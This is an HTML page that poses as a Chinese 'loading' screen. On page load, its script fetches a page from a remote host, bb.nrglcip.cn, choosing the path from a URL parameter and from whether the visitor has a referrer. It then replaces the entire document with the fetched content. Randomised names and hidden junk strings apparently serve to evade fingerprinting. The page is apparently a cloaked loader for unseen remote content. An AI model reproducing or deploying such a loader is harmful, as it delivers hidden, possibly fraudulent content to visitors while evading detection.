<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .nlocmNq9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .nlocmNq9 .cMnX7RCjvY {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .nlocmNq9 .content {
            line-height: 50px;
            text-align: center
        }

        .nlocmNq9 .img {
            width: 100%
        }

        .nlocmNq9 .jFhQE2 {
            text-align: center
        }

        .nlocmNq9 .jFhQE2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .nlocmNq9 .jFhQE2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .nlocmNq9 .jFhQE2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .nlocmNq9 .jFhQE2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .nlocmNq9 .jFhQE2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .nlocmNq9 .jFhQE2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .nlocmNq9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aoqAr8CWW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EmPEp = aoqAr8CWW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EmPEp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EmPEp +".html?a=share";
		}
		
        sqQ1ER5Q=url+"#"+new Date().getTime();
        sqQ1ER5Q && function() {
            $.get(sqQ1ER5Q, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>Fiwt89CAmPQJncQcxUgyfyGw8EqNB5Or8p703YxOgSaM6kofxBjd4uHdPbpL3JXL9K5EymzzTjhi35wa44Haw9Wgi6W</a>
<span style='display:none'>UJje46RMaeueaeDsXtmdSEizCqyGRGdUixo01YNyX1HZzo9SgNdX1jWdJjWo</span>
<li style='display:none' >Ez3gHIHZ6XA3w6YoVtC537vOdEcVdlV1grcejMzKyAiTe0jRigWb8PdB5kOFOyQ7Wmjos6XvFTWhVzA29lgccCI46k</li><div class="nlocmNq9">
    <div class="cMnX7RCjvY">
        <div class="jFhQE2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >N63J6KjMEczfbylpm3M36Mfl2ml66V7IsWSRRqfq5eq7uY0xhhhG5fidOgkUuaW9JpC2sHcazNe4uHAt6e5pvUOcGGUFwTl</b>
<h1 style='display:none' >CvHYBiJZGh0R8VKx5qQ5TanKJulKnn</h1>
<div style='display:none'>LyVYeoOcW8J7fE5RjtNNYlQ6jMW1BhVdZqc9XzyDIHdWrYpW8BH</div>
<span style='display:none'>JW2Se5AWgAZur6BzA248582yq10eOAGRIkh4zLNKRamdDbXqzoA6kyaZNik</span>
<ul style='display:none' >xCwadcsLVNGKebcKqdIAUpAMk8KmlP29uTZGGEhoc4RpACMf42cn97CKjrGcq</ul></body>
</html>